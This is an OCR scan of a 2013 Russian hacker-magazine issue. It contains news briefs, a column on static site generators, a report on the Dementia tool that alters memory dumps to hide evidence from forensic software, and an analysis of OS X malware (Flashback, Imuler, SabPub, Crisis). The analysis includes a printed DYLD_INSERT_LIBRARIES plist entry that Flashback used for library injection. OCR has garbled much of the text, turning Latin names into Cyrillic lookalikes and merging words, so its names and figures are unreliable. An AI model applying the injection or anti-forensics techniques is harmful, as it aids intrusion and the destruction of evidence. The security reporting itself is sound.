Бкуре для переправки скрытых данных, то есть для стеганографии. 

Согласно данным исследователей, во время разговора Бкуре 
передает 130-байтные пакеты, однако если на линии царит 
тишина, Бкуре переходит на «экономичные» пакеты в 70 байт. 

На этом и сосредоточили свое внимание поляки; былосоздано 
экспериментальное приложениеБкуреНісІе, которое размещает 
шифрованные данные в этихсамых «тихих пакетах». Исследо- 
ватели уверяют, что на слух заметить подвох совершенно невоз- 
можно — передаваемые данные ничем неотличаются отобычной 
тишины. Анализ звука, даже если разложить его по частотам, тоже 
не позволит определить наличие подозрительной активности. 
Обнаружить скрытую передачу данных можно только с использо- 
ванием сетевого анализаторатрафика. Последнее обстоятельство 
совсем не печалитполяков, ведьони ориентировалисьна сокрытие 
данных, скажем, отпрослушки или на случай записи разговора. 
Подробности авторы БкуреНісіе обещали раскрыть в июне, на фо- 
руме Еігзі АСМ Іп(огтаІіоп Нібіпд апсі МиШтебіа БесигіІуѴѴогкзЬор, 
что пройдетвоФранции. 





БЛИЗИТСЯ КОНКУРС 
Р\#Ы20\АЖ 2013 — он пройдет 
6-8 марта в Ванкувере. В этом 
году в правилах произошли 
небольшие изменения:теперь 
автор обязан предоставить код 
своего эксплойта организа- 
торам и не имеет права его 
никому продавать. Благодаря 
изменению в правилах Ооодіе 
вернулась к роли спонсора кон- 
курса, а вместе с ней вернулись 
и серьезные денежные призы 
(до 1 00 тысяч долларов). 




В 05 X НАШЛИ ЗАБАВНЫЙ 
БАГ: если в любой программе, 
использующей спеллчекер, 
набратьтекст«РНе:///»,то 
приложение падает. Актуаль- 
но для версии 05Х Моипіаіп 
Ыоп (10.8) и выше. 




ЖІНЕ ПОРТИРОВАЛИ ПОД 
ОС АНОКОЮ, что на конфе 
Р050ЕМ 2013 продемонстри- 
ровал главный разработчик 
Александр Жул ьярд. Даты 
выхода релиза пока неиз- 
вестны. 



ою 
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ТОП-3 ПРИЛОЖЕНИЙ ДЛЯ 105 И АНОКОЮ В КОНЦЕ 2012 ГОДА : РасеЬоок 185 574), Ооодіе Марз (74631), боодіе РІау (61 461), поданным сотЗсоге. 



БЛАГИМИ НАМЕРЕНИЯМИ 
ВЫМОЩЕНАДОРОГА... 

ИЗ КОЛЛЕДЖА 

СТУДЕНТА ВЫГНАЛИ ИЗ КОЛЛЕДЖА 
ЗА ОБНАРУЖЕННУЮ УЯЗВИМОСТЬ 

транная история приключилась недавно в Монреале. Этот 
случай довольно наглядно иллюстрирует, что любознатель- 
ным и законопослушным хакером быть чревато не только 
в развивающихся странах (где тебя скорее арестуют, чем скажут 
спасибо за найденную дырку), но и на демократичном Западе. 

Студент колледжа Доусона Ахмед ал ь-Хабаз явно не предпола- 
гал, что делаетчто-то плохое, когда начинал работунад мобильным 
приложением. Приложение это было призвано облегчить жизнь 
студентам, упростив для них работунаучебном портале. Упомя- 
нутый портал базировался на системе Отпіѵох, принадлежащей 
компании Бкуіесіі. Данной системой пользуются практически все 
высшиеучебные заведения Квебека. В ходе работы над своим при- 
ложением Ахмед запустил сканер уязвимостей Асипеііх и обнару- 
жил в Отпіѵох дырку. По всему выходило, чтолюбой мало-мальски 
подкованный человексможетполучитьдоступ кпрофилюлюбого 
студента в системе (включая приватные данные, такие как номер 
социального страхования, домашний адрес, номер телефона, рас- 
писание занятий итак далее). Ахмед тут же сообщил о найденной 
уязвимости руководству колледжа, по-прежнемудаже не догады- 
ваясь, что могсделать что-то «нето». 

Сначала все шлохорошо. ІТ-директор колледжа пригласил 
на встречуАхмеда и его друга (они работали над проектом вдвоем), 
пообещал совместно со специалистами БкуІесЬ закрыть дырку 
и поблагодарил программистовза бдительность. Через пару дней 
ал ь-Хабаз решил проверить, устранена л и уязвимость, и вновь за- 
пустил сканер. Практически сразу зазвонил телефон. Удивленному 
Ахмеду звонил лично директор компании БкуіесЬ и уже совсем 
нес благодарностями. Он заявил, что уже второй раз наблюдает ак- 
тивность Ахмеда и назвал его действия кибератакой. Программист 
в ответ попытался объяснить, что это именно он нашел уязвимость 
пару дней назад и теперь лишь проверял, закрыта ли она, однако 
директор не хотел ничего слушать. Он сообщил, что за подобные 
действия дают от полугода до года тюрьмы, и велел студенту не- 
медленно приехать в офис компании и подписать бумагу о нераз- 
глашении. Шокированный ал ь-Хабаз так и поступил. Ему было 
запрещено разглашать не только любую информацию о найденной 
уязвимости, но даже сам факт наличия этого документа. 

Вскоре о случившемся узнало руководство колледжа, 
как говорится — шила в мешке не утаишь, несмотря на любые 
соглашения. Профессора думали недолго и вскореуже начали 
процедуруотчисления Ахмеда из-за «серьезного нарушения про- 
фессиональной этики». Из пятнадцати профессоров с факультета 
компьютерных наук за отчисление аль-Хабаза проголосовали 
четырнадцать человек. 




На данный момент ал ь-Хабаз пытается восстановиться в колледже, но благодаря 
огласке, которую получила эта история, ему уже поступил десяток серьезных пред- 
ложений о работе, так что, надеемся, у него все сложится хорошо. 

Теперь, когда вся эта история всеже выплыла наружу, руковод- 
ствоБкуІесЬ пытается оправдываться. В компании святоуверены, 
что использовать сканер уязвимостей Ахмед не имел права. Такие 
программы, по их мнению, можно применять, лишь имея предва- 
рительное разрешение владельца сервера. Разумеется, студент 
с этим не согласен. И хотя он уже обелил свое имя, рассказав эту 
историю СМИ, места в колледже это ему, похоже, уже не вернет. 




М02ІЫ.АВЫПУСКАЕТСМАРТФ0НЫ НАСВОЕЙ ПЛАТФОРМЕ 



ДВА АППАРАТА С РІКЕРОХ 05 НА БОРТУ 
(ОДИН ПОПРОЩЕ И ОДИН ПОМОЩНЕЕ) 
СТАНУТ ДОСТУПНЫ РАЗРАБОТЧИКАМ 
УЖЕ В ЭТОМ МЕСЯЦЕ 
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ВОЗВРАТ К ИСТОКАМ 

Правильно ведь говорят: «Все новое — хорошо 
забытое старое». Вот я помню, как много лет 
назад в блокноте создавал свой первый іпсіех. 
МтІ и заливал на тогда популярный хостинг 
ОеоСіІіез.сот. Позже стало ясно, что из ста- 
тических страничек можно слепить разве 
что домашнюю страничку, — для чего-то более 
серьезного нужны РегІ и С6І. Теперь, когда есть 
миллион способов создавать динамические 
страницы, разработчики, наоборот, стали часто 
стремиться к «статике», особенно в высокона- 
груженных местах. Оно и понятно: нет никаких 
оверхедов на генерацию контента (страница 
уже готова), при этом все страницы разом легко 
кешируются (помещаются в память для мо- 
ментальной отдачи клиенту). Но это история 
не только про высоконагруженные системы, 
но и про обычные сайты. Популярный сейчас 
тренд — движки для генерации статическо- 
го контента. С их помощью можно создавать 
довольно сложные сайты, получая в конечном 
итоге набор статических файлов, которые мож- 
но легко захостить где угодно: хоть на Атагоп 
53, хоть даже на ОііНиЬ. Не нужно возиться 
с настройкой сервера, при этом сайт получает- 
ся непробиваемым (попробуй сломать ресурс 
из статических файлов). 

КАК ЭТО РАБОТАЕТ? 

Общий принцип работы таких движков простой. 
Есть директория с шаблонами, в которых с ис- 
пользованием шаблонизатора задается верстка 
будущих страниц. И есть директория с контен- 
том для сайта: как правило, это набор текстовых 
файлов, размеченных с помощью Магкбоѵѵп. 

Что делает генератор статического контента? 
Берет файлы из директории с контентом, приме- 
няет к ним шаблоны из директории с темплей- 
тами и на выходе выдает набор статических 
НТМІ_-ек, которые можно загрузить на сервер. 

Возьмем для примера блог. Новый пост 
оформляется в виде отдельного Магкбоѵѵп- 



КОЛОНКА 
СТЁПЫ ИЛЬИНА 



СТАТИЧЕСКИЕ 

ГЕНЕРАТОРЫ 

САЙТОВ 



файла. После любого обновления нужно запу- 
стить движок, который генерирует статические 
НТМІ_-файлы. Далее полученные исходники 
сайта загружаются на хостинг. Многие движки 
берут развертывание сайта на себя, поэто- 
му все, что требуется для обновления, — это 
создать файл с содержанием нового поста 
для блога. 

КАКИЕ БЫВАЮТ ГЕНЕРАТОРЫ? 

Один из самых известных генераторов стати- 
ческого контента — это блогерский движок 
Осіоргезз ( осіоргезз.огд ). который я и попробо- 
вал в действии. Помимо него, также популярны 
Міббіетап Ітіббіетапарр.сот ). ]екуІІ ( ]екѵІІгЬ. 
сот ). Мезіа СМ5 Іпезіастз.сот ). Всех их объ- 
единяет одно — они написаны на ВиЬу. Есть 
реализации на Мобе.б5 (например, РипсЬ — 
ІакІек.дііЬиЬ.сот/рипсЬ ). есть и на РуіЬоп 
(Чубе — гіпдсе.сот/Ьѵбе ). Все они используют 
один и тот же принцип, но отличаются в деталях: 
поддержке разных шаблонизаторов, используе- 
мой разметке исходных данных и так далее. 

КУДА РАЗВЕРНУТЬ? 

Нет смысла показывать, как запустить пару 
команд генератора. У каждого из движков есть 
инструкции, как за пять минут сгенерировать 
статический сайт. Интересно другое — как ис- 
пользовать преимущества того, что мы от- 
казываемся от динамики. Где разместить такой 
сайт? Чаще всего используется три варианта: 

• страницы на бііНиЬ (у уѵѵѵѵ.дііЬиЬ.сот ): 

• Атагоп 53 І аѵѵБ.атагоп.сот/зЗ ); 

• Негоки [ уѵѵт.Ьіегоки.сот ). 

Одна из фишек СііНиЬ'а — возможность 
создавать странички (ѲііЬиЬ Радев) для разра- 
ботчиков, которые используют сервис для хра- 
нения репозиториев кода. Если выбрать этот 
бесплатный вариант, то все файлы сайта будут 
храниться прямо в біі-репозитории. Это очень 
удобно, поскольку читатели могут предложить 



свои РиІІ РедиезГы и таким образом, к примеру, 
помогать исправлять ошибки. При этом сайт 
ты можешь привязать к своему домену. 

53 — это надежное хранилище для файлов 
от Атагоп. Так как все файлы сайта весят ни- 
чтожно мало, а трафика, скорее всего, будет 
немного, на хостинг не потребуется много денег. 
Зато его 99,9%-я доступность практически 
гарантирована. 

Негоки — еще одна облачная платформа, 
разработанная для быстрого развертывания 
веб-приложений (на РуіЬоп, РиЬу, 5саІа, Эаѵа 
и прочем). В случае со статическим сайтом ис- 
пользовать ее можно бесплатно. 

ДОБАВИТЬ ДИНАМИКИ 

Надо понимать, что любой статической стра- 
нице сегодня легко можно добавить динамики 
через АбАХ. Взять опять же блог, реализо- 
ванный с помощью генератора статического 
контента. Без комментариев это, увы, не блог. 
Однако комментарии элементарно подклю- 
чаются с помощью стороннего сервиса вроде 
Оіздиз, Ыѵе^уге, ІпІепзеОеЬаІе. Благодаря 
таким инструментам подход к созданию сайтов 
с генерацией статических страниц приобретает 
еще больший смысл. X 




О статических генераторах контента многие узнали 
благодаря Осіоргезв 





сіоиб арріісаііоп ріа^огт 
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Кип Алуіітѵд 




Т.и« & М*піуі 



Интересная РааБ-платформа для супербыстрого 
развертывания веб-приложений 
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РгооРоРСопсерІ: 

ОЧИЩАЕМ ОПЕРАТИВНУЮ 
ПАМЯТЬ ОТ УЛИК 



ЧТО ЭТО ТАКОЕ 

Консультант по информационной безопас- 
ности из хорватской фирмы Іп(ідо Лука Мил- 
кович Пика МіІкоѵі<5) разработал программу 
Оетепііа, которая должна стать обяза- 
тельным инструментом в арсенале каждого 
хакера. Программа написана под ѴѴіпсіоѵѵз и 
постоянно следит за появлением сканера, 
который через соответствующий драйвер 
снимает дамп памяти. Как только сканер 
обнаружен, программа перехватывает снятие 
дампа и удаляет специфические артефакты 
из памяти. Таким образом, она вмешивается 
в процесс снятия дампа памяти, изменяя его 
содержимое. 

йетепЛа успешно справляется с со- 
крытием улик от популярных инструментов 
для криминалистической экспертизы, таких 
как Моопзоіб \Л/іп32(М (только в режиме кегпеі- 
тосіе), Мапгііапі'5 Метогуге, МапТесЬ МОй, 

РТК Ітадег и ѴѴіпртет. 



ЗАЧЕМ ЭТО НУЖНО 

Программы для криминалистической экс- 
пертизы умеют извлекать много ценной 
информации из оперативной памяти, в том 
числе фрагменты открытых ранее файлов, 
фрагменты вредоносного кода, важные 
объекты, как активные, так и завершен- 
ные: процессы, нити, соединения, пароли 
Р6Р, информацию о различной активности 
на компьютере. Правоохранительные органы 
в процессе расследования полагаются на эти 
сведения как на реальные улики. В последнее 
время анализ РАМ считается почти таким 
же эффективным и надежным инструментом 
криминалистической экспертизы, как анализ 
содержимого НПО. 

Поскольку эксперты-криминалисты на- 
чали использовать специализированный 
софт, то появилось и контроружие для за- 
щиты памяти от экспертизы. Первыми таким 
программами были Нагиуата и 5ЬасіоѵМ/аІкег, 



но, к сожалению, они умеют только блоки- 
ровать память от сканирования, прерывать 
процесс сканирования или блокировать 
анализ. Оетепііа продолжает их традиции, 
но впервые программа способна изменить 
содержимое памяти, не останавливая процесс 
сканирования. 

КАК ЭТО РАБОТАЕТ 

Оетепііа может скрывать конкретные объекты 
в дампах памяти под операционной системой 
ѴѴіпсіоѵѵб. Схема снятия и анализа дампа про- 
граммами для криминалистической эксперти- 
зы показана на рисунке. 

Оетепііа перехватывает вызов 
№Ѵ\/гіІеРіІе() и проверяет, что этот вызов 
действительно поступил от программы снятия 
дампа памяти. У них есть характерные при- 
знаки, в том числе специфические аргументы 
ІЧіѴѴгіІеРіІеО, определенный контекст и специ- 
фические значения РІІ_Е_ОВЗЕСТ. Программа 
строит список всех физических адресов в па- 
мяти, каким-либо образом связанных с про- 
цессом, который нужно скрыть. Перед записью 
дампа памяти в файл она убирает этот процесс 
из списков процессов АсІіѵеРгосеБзЫпкз 
и ВеззіопРгосеззипкз и стирает из дампа 
данные, которые имеют отношение к процессу: 
нити, ссылки, выделенные области памяти 
(дескрипторы ѴАО). 

В принципе, Оетепііа не скрывает свою 
активность в системе, так что любая более-ме- 
нее толковая программа для криминалистиче- 
ской экспертизы может определить ее наличие 
и считать улики скомпрометированными. 
Криминалистам придется использовать другие 
способы делать дампы памяти без искажений 
с работающей машины, предполагает автор 
программы Милкович. 

Оетепііа протестирована под 32-бит- 
ными операционными системами Мпсіоѵѵз 
ХР, ѴѴіпсІоѵѵз Ѵізіа и ѴѴіпсІоѵѵз 7. Сейчас автор 
работает над 64-битной версией. Презентация 
Ретепііа на хакерской конференции ССС (28 
декабря 2012 г.): Ьіі.Іѵ/ЦНсіРг . Код Оетепііа 
должен быть скоро опубликован здесь: согіе. 
ооод1е.сот/р/сіетепиа-?огеп5Іс5. автор обещал 
выложить его еще в январе. □□ 




1. Чтение \\І>*ѵісв\\РЬу*іса1Мвтогу 

2. Маппинг физических адресов памяти (мгамаріоврасео) 

3. Другое (например, кміармапогуошфмаі о ) 



Схема снятия и анализа дампа памяти программами для криминалистической экспертизы 
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МАЛ ВАРЬ 
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ГОРЯЧИЙ ПАРАД 
МАС-ОРИЕНТИРОВАННОЙ 
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До поры до времени система 05 X не пред- 
ставляла интереса для троянописателей, 
и вредоносы под нее проходили под терми- 
ном Іатѵѵаге (ламерское таіѵѵаге). Но, как бы 
ни хотелось маководам этого избежать, в про- 
шлом году беда пришла и в их гламурненькие 
домики. 2012 год открыл сезон: РІавЬРаке (ака 
РІавЬВаск], Ітиіег, ЗаЬРаЬ и Сгізів — что объ- 
единяет эти страшные слова? Да то, что все эти 
вредоносные программы разработаны для ата- 
ки компьютеров с эмблемой надкусанного 
яблока. Об этих вредоносах и пойдет речь. 

Первая эпидемия 



ФЕЙКОВЫЙ ФЛЕШ 



Небезызвестная компания «Лаборатория Касперского» в марте 
2012-го обнаружила ботнет на базе ни много ни мало около 600 
тысяч компьютеров с 05 X. Среди общего количества больше поло- 
вины из них находились на территории США (см. рис. 1). Четверка 
лидеров: 

• США — 303 449; 

• Канада — 106 379; 

• Великобритания — 68 577; 

• Австралия — 32 527. 

Все они были заражены трояном, который получил название 
РІазИРаке. Такое имя было выбрано потому, что он маскировался 
под установщик АсіоЬе РІазЬ РІауег. Первые версии РІазЬРаке были 
обнаружены в сентябре 2011-го. 

РІазЬРаке использовал для связи со своими командными сер- 
верами механизм 06А Юотаіп ОепегаЬоп АІдогіІЬт — алгоритм 
генерации доменных имен), генерировавший случайные домен- 
ные имена в зависимости от текущей даты, по пять штук в день. 
Этим не преминули воспользоваться сотрудники антивирусных 
компаний для развертывания зіпкЬоІе-маршрутизаторов, чтобы 
оценить примерное количество заражений. Жаль, что компания 
Рг.ѴѴеЬ не сообщила об этом компании Арріе — последняя подала 
запрос на отзыв одного из доменных имен, используемого Рг.ѴѴеЬ 
для работы своего 5ІпкЬоІе-маршрутизатора... Помимо 00А, в коде 
РІазЬРаке имелось 25 жестко заданных С&С. 
ф. Основная «заслуга» РІазЬРаке состоит в том, что теперь для за- 
ражения малварью не требовалось каких-либо действий со сторо- 
* ны пользователя Мае — кроме, разумеется, посещения странички 
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Малварь для 05 X 




Рис. 1. Где «жил» РІазЬРаке 4 апреля 2012 года 



с вредоносными редиректами. До него трояны для 05 X маскирова- 
лись под установочные файлы, и для их успешной работы пользо- 
ватель должен был ввести пароль администратора, что существен- 
но снижало риск заражения. Поначалу и РІазЬРаке использовал 
похожую методику, заражение происходило достаточно примитив- 
ным и старым как мир способом: при посещении пользователем 
вредоносного сайта выдавалось сообщение, что для корректного 
отображения страницы нужно установить последнюю версию РІазЬ 
РІауег. Если пользователь решал, что ему это жизненно необходи- 
мо, и соглашался, устанавливался поддельный инсталлятор с рас- 
ширением сірд или тркд. К слову сказать, инсталлятор выглядел 
достаточно презентабельно и правдоподобно (см. рис. 2). В каталог 
/ЫЬгагу/Рге^егепсез помещался файл Рге^егепсез.гіуІіЬ, который 
и осуществлял всю вредоносную деятельность. В качестве иден- 
тификатора зараженной системы использовался Мйб-хеш от ІІІІЮ 
компьютера (ІІпіѵегзаІІу Упщие Ісіепііііег — уникальный 16-байтный 
номер, генерируемый ОС). Чтобы затруднить жизнь сотрудников 
антивирусных компаний, вся коммуникационная деятельность 
между ботом РІазЬРаке и командным сервером шифровалась по ал- 
горитму РС4. Для защиты от подмены управляющий сервер должен 
был вернуть «правильный» отзыв, представляющий собой свой 
собственный адрес, подписанный Р5А-2048 ключом злоумышлен- 
ников с дайджестом М05 и преобразованный в Ьазе64. 

Понимая, что Ігие таіѵѵаге должно запускаться автоматиче- 
ски, а не ждать, пока пользователь соблаговолит нажать кнопку 
«Установить», разработчики РІазЬРаке с февраля 2012 года в, так 
сказать, второй версии начали использовать для распростра- 
нения своего творения уязвимости виртуальной машины .Лаѵа 
СѴЕ-201 1 -3544 и СѴЕ-2008-5353. Для их эксплуатации применялись 
вредоносные файлы гЫіЬ^аг и сІсІіЬ.іаг соответственно. Кроме 
того, применялся еще файл ззідп.]аг, который не содержал в себе 
никаких эксплойтов, а просто был подписан недействительной 
подписью в надежде, что пользователь добавит эту подпись в спи- 
сок доверенных и тем самым разрешит выполнение кода. 

Как видно уже из названия, СѴЕ-2008-5353 — уязвимость доста- 
точно старая, да и о СѴЕ-201 1 -3544 информация была опубликована 
еще 18 октября 2011 года, то есть была ни разу не гего сіау на момент 
распространения РІазЬРаке. Огасіе выпустила патч для нее в том 
же месяце. В настоящее время СѴЕ-2011-3544 лидирует по успеш- 
ному «пробиву» защиты браузеров и используется в большинстве 
эксплойт-паков, например ВІаскНоІе. После 16 марта стал приме- 
няться эксплойт для уязвимости СѴЕ-2012-0507. И опять-таки Огасіе 
закрыла эту уязвимость в феврале, а корпорация Арріе выпустила 
исправление для нее только 3 апреля 2012 года. 

Каким же образом происходило заражение? Есть сведения, 
что в поисковой выдаче Ѳоодіе присутствовало около четырех 






миллионов веб-страниц, содержащих редиректы на вредоносный 
)аг-файл. Некоторые пользователи даже отмечали случаи зараже- 
ния РІазЬРаке при посещении сайта компании О-Ыпк! В качестве 
площадок для размещения вредоносных редиректов использова- 
лись взломанные через неизвестную уязвимость блоги, функцио- 
нирующие под управлением ѴѴогсІРгезз. 

Прежде чем загрузить троян, вредоносный Заѵа-апплет прове- 
рял систему на наличие пакета разработчика X Сосіе или файрвола 
І_іШе5пі(сЬ (а также некоторых других приложений антивирусной 
направленности). Если нежелательные программы присутствова- 
ли, установка не производилась. Вероятно, таким образом зло- 
умышленники пытались отодвинуть момент обнаружения 
РІазЬРаке каким-либо «продвинутым» пользователем. 

В случае успешного запуска загрузчик РІазЬРаке, находя- 
щийся в ]аг-файле, связывался с командным центром и загружал 
два модуля, один из них был основным и отвечал за дальнейшее 
взаимодействие с С&С и обновление себя, а второй использовался 
для внедрения в браузер. 

Основной модуль копировался в каталог $Н0МЕ под случайным 
именем, в начале которого была точка, например .пиІІ. Для авто- 
запуска РІазЬРаке использует фичу 05 X под названием 5сгірІіпд 
асісііііопз. Изначально она была предназначена для расширения 
функционала установленных приложений другими приложе- 
ниями. Фактически это механизм легального внедрения кода 
в другие процессы, что и было использовано злоумышленниками. 
Ссылка на основной модуль помещалась в файл $НОМЕ/І_іЬгагу/ 
1_аипсЬАдепІз/.рІізІ, это обеспечивало передачу ему управле- 
ния при запуске любого приложения. Административные права 
для этого не требовались, так как запись производилась в каталог 
текущего пользователя. 

Внедряемый модуль, используемый для перехвата трафика и под- 
мены страниц в браузере, устанавливался одним из двух способов. 
Пойдя по пути наименьшего сопротивления, первым делом он пы- 
тался внедриться в браузер 5а!агі. Правда, для этого ему необходимы 
были права гооі. Для их получения перед пользователем демон- 
стрировалось окно ввода административного пароля (рис. 3), якобы 
для нужд обновления программного обеспечения. Если такой вариант 
не проходил, существовал план В. Согласно ему внедряемый модуль 
под именем .ІіЬдтаІІос.сІуІіЬ помещался в /ІІзегз/ВЬагегі, а в файл 
епѵігоптепі.ріізі в $Н0МЕ/.Мас05 вносилась следующая информация: 

<кеу>0ѴЮ_ІМ5ЕКТ_І_ІВКАКІЕ5</кеу> 

<5І:гіп§>/и5ег5/5ЬагесІ/ . 1іЬ§та11ос . сІу1іЬ</з1гіп§> 

В результате .ІіЬдтаІІос.гіуІіЬ внедрялся во все приложения. 
План В не использовался, если в системе обнаруживались прило- 




Рис. 2. Фейковый инсталлятор АОоЬе РІазН — найди хоть одно отличие 



ХАКЕР 03/170/2013 



015 





С0ѴЕК5Т0КѴ 



Туре уоиг ра$$ѵѵог<і (о аііоѵѵ Іірсіаіе (о таке 
сЬапдез. 



Ыате ^те$ 

Ра$$ѵѵогсі | 

► Оеиііі 

® ( СапстІ ) ( <Ж ) 



Рис. 3. РІазЬРаке «просит» пароль 
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Рис. 4. Содержимое архива с Реѵіг.С — исполняемый файл прячется среди .ІРС-ов 




жения из состава МісгозоК ОНісе 2008/2011 и Бкуре. Арріе прикры- 
ла фичу с 0УЮ_1М5ЕРТ_иВРАР1Е5, начиная с версии І_іоп 10.7.4. 

Последние (на момент сдачи статьи в печать] версии РІазбРаке 
отметились использованием механизма поиска своих управляю- 
щих центров через Тѵѵіиег. Также, очевидно, разработчики решили 
упростить себе работу по написанию кода и вынесли функционал 
перехвата и подмены контента для браузера Рігеіох в отдельный 
плагин хрі, маскирующийся опять-таки под АсІоЬе РІазН. 

Вволю поэксплуатировав вычислительные мощности ничего 
не подозревающих пользователей, неустановленные злоумыш- 
ленники свернули лавочку в мае 2012-го. Именно тогда перестали 
функционировать командные центры. Профит заключался в на- 
крутке трафика посещения сайтов (доход от рекламы) и манипуля- 
циях с поисковой выдачей (сервис продвижения сайтов «запре- 
щенными» методами ВІаскБео). Вера пользователей Маков в свою 
«безопасную» платформу несколько пошатнулась, а Арріе даже 
удалила установку .Лаѵа по умолчанию из стандартной конфигура- 
ции установки системы. 

Вторая эпидемия 



ЦЕЛЬ — ТИБЕТ 



Весь 2012 год прошел под девизом «побольше маковских троянов 
в Тибете, хороших и разных». Речь идет об эпидемиях с политиче- 
ским подтекстом, связанных с давней борьбой Тибета за неза- 
висимость от Китая. Первой ласточкой было семейство Веѵіг/ 

Ітиіег по классификации Р-5есиге, двойное название которого 
объясняется так: Реѵіг — это дроппер, а Ітиіег — бэкдор Шг.ѴѴеЬ 
его называет Михіег), устанавливаемый дроппером. Обнаруженный 
еще осенью 2011 года первый вариант Реѵіг.А, скорее всего, был 
пробным шаром. Да и вообще, все его семейство модификаций 
как нельзя лучше подходит под определение Іатеѵѵаге, методы 
он использовал донельзя примитивные. Однако, если рассматри- 
вать все через призму политической направленности, возникает 
впечатление, что создатели руководствовались принципом Окка- 
ма — не нужно ничего усложнять без надобности. В самом деле, 
зачем все эти новомодные эксплойты и куча кода, когда методы 
социальной инженерии и так прекрасно работают? 

Но вернемся к нашему Реѵіг.А — он представлял собой исполня- 
емый файл, который маскировался под РОЕ. В диком виде образец 
так и не был найден, так что остается только догадываться, под 
каким соусом его подавали пользователю, есть мнение, что через 
целенаправленную рассылку конкретным лицам. Запущенный 
Реѵіг.А извлекал из себя РйР-файл на китайском языке и демон- 
стрировал его пользователю. Одновременно с удаленного сервера 
скачивалась и запускалась полезная нагрузка — ІтиІег.А. 

В результате в каталоге /ОзегзЛимя пользователя}/ІіЬгагу/ 
І_аипсЬАдепІз оказывался основной модуль сЬескѵіг, создава- 
лась ссылка на него в сЬескѵіг.рІізІ, а в /ІІзегзЛимя пользова- 
теля}/ПЬгагу — файл .соп^Ьаск с адресами командных центров. 
Инструкции, получаемые с С&С, предусматривали выполнение 



следующих команд: 

• загрузить файл с удаленного сервера; 

• запустить файл на выполнение; 

• собрать и отправить системную информацию — внешний и вну- 
тренний айпишник, МАС-адрес, версию ядра ОС и имя юзера; 

• отправить интересующие файлы в архиве; 

• отправить скриншот экрана. 

Вариация Веѵіг.В, так же как и Реѵіг.А, скрытно устанавливала 
ІтиІег.А, но маскировалась уже под .ЛР6. 

Судя по всему, авторы не унывали, вдумчиво почитали журнал 
РИМ БоиіЬ А(гіса за март 2012-го с российской моделью Ириной 
Шейк на развороте и замутили очередную попытку обмана доверчи- 
вых пользователей. Нагугленные сочные скриншоты были помеще- 
ны в архив РИМ РеЬ Соѵег бігі Ігіпа БЬаук Н-Рез Рісз.гір. Кроме того, 
туда же был помещен Реѵіг.С, обладающий миниатюрой картинки 
(рис. 4). По умолчанию расширения файлов в 05 X не отображаются, 
так что шансы на запуск увеличивались. Для усложнения жизни 
антивирусным исследователям полезная нагрузка была зашифро- 
вана по алгоритму РС4, в качестве ключа вредоносное приложение 
использовало первые 2048 байт картинки, отображаемой поль- 
зователю при запуске. Архив с Реѵіг.й и другим набором картинок 
назывался Рісіигез апсі 1Ье Агііісіе о! Репгіп Оопее.гір. Бэкдор 
сменил название своих файлов (но не функционал) и стал иденти- 
фицироваться как ІтиІег.В. Уже тогда было сделано предположение, 
что распространение данных угроз связано с китайско-тибетским 
конфликтом и направлено против различных активистских органи- 
заций, борющихся за независимость Тибета. Архив, рассылаемый 
в октябре 2012-го, уже не оставлял в этом никаких сомнений. Все три 
фотографии с изображениями представителей тибетских организа- 
ций были на самом деле вредоносными приложениями Реѵіг.Е. 

Весной против тибетских активистов использовались и более тех- 
нологичные разработки, относящиеся к классу АРТ. По горячим следам 
уязвимости ^ѵа, используемой РІазЬЬаск (СѴЕ-201 2-0507), в апреле 
2012 года в свет выходит еще одна разработка, троян БаЬРиЬ. 

^ѵа-дроппер извлекал в каталог /ІІзегзЛимя пользовате- 
ля}/І_іЬгагу/Рге{егепсез полезную нагрузку под именем сот. 
арріе. РиЬБаЬАдепІ.рПІе и прописывал ее в файле сот. арріе. 
РиЬБаЬАбепІ.рІізІ в этом же каталоге для последующей загрузки. 
Нагрузка выполняла типично шпионские функции: формирование 
списка файлов, отправку интересующих файлов, а также скрин- 
шотов на удаленный сервер. В качестве средства доставки, кроме 
^ѵа-апплета, также использовался файл сіос, содержащий в себе 
эксплойт уязвимости М509-027. Помимо БаЬРиЬ, уязвимости 
СѴЕ-201 2-0507 и М509-027 использовались для распространения 
вредоносов ОІух и Масопігоі. Антивирусные компании любят все 
усложнять, и в их статьях можно встретить наименование Ьатасіаі, 
под ним скрываются ОІух. В (1_атасіаі.А) и БаЬраЬ.А (1_атасіаі.В). 

В общем, несмотря на наличие многих технологических ре- 
Г ! ' шений защиты компьютеров, атаки на 05 X не слишком сильно 
" отличаются от атак на ѴѴіпсІоѵѵз. Технологии меняются, пользовате- 
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ли — нет. Многие не следят за появлением исправлений системы, 
не устанавливают вовремя обновления безопасности, переходят 
по всякого рода сомнительным ссылкам и рассматривают фотогра- 
фии эротического содержания, непонятно откуда скачанные. И еще 
раз, для скептиков: права гооі для всего этого не нужны. 

Третья эпидемия 



ОПЯТЬ КАКОЙ-ТО СКІ5І5 



Сгізіз — именно такая строка содержалась внутри кода очередного 
образца вредоносной программы, обнаруженного компанией Іпіедо 
в июле 2012 года на известном сайте проверки подозрительных 
файлов ѴігизТоІаІ. Подобный образец был прислан также в компа- 
нию «Доктор Веб». Сгізіз был кросс-платформенным трояном и мог 
инсталлироваться на компьютеры как с ОС ѴѴіпгіоѵѵз, так и с 05 X. 

В то время Сгізіз не был обнаружен іп 1Не ѵѵіісі, да и Казрезгку І_аЬ 
в своей сети Казрегзку 5есигі(у Ыеіѵѵогк, работающей на базе 
компьютеров с установленным антивирусом Касперского, ничего 
похожего не детектировал. Так что был сделан вывод, что Сгізіз — 
инструмент для проведения точечных атак. В настоящее время 
существуют несколько образцов, которые отличаются используе- 
мыми внутри себя именами файлов. 

Инфицирование компьютера начинается с запуска вредоносно- 
го ^ѵа-апплета с названием АсіоЬеРІазЬРІауег.іаг, который имеет 
цифровую подпись, созданную при помощи самоподписанного 
сертификата, якобы принадлежащего компании Ѵегі5ідп. Если 
пользователь будет достаточно беспечен, он, несмотря на все пред- 
упреждения системы о недоверенном сертификате, нажмет кнопку 
«Принять», что и приведет к внедрению вредоноса в систему. В за- 
висимости от целевой платформы, из ^ѵа-апплета извлекается, 
сохраняется на диск и запускается установочный модуль ѴѴіп- или 
Мас-архитектуры. Стоит заметить, что Сгізіз не использует для своей 
работы никаких эксплойтов уязвимостей. Это, вероятно, сделано 
для затруднения будущих детектов по сигнатуре эксплойта. Кроме 
того, после массового пропатчивания уязвимостей Сгізіз пере- 
стал бы нормально запускаться. А так все работает — социальная 
инженерия рулит! К тому же недостаток эксплойтов с лихвой пере- 
крывается встроенным функционалом слежения за деятельностью 
пользователей зараженных компьютеров. Вот краткий перечень: 

• сіоѵѵпіоасі и иріоасі произвольных файлов; 

• запуск исполняемых файлов; 

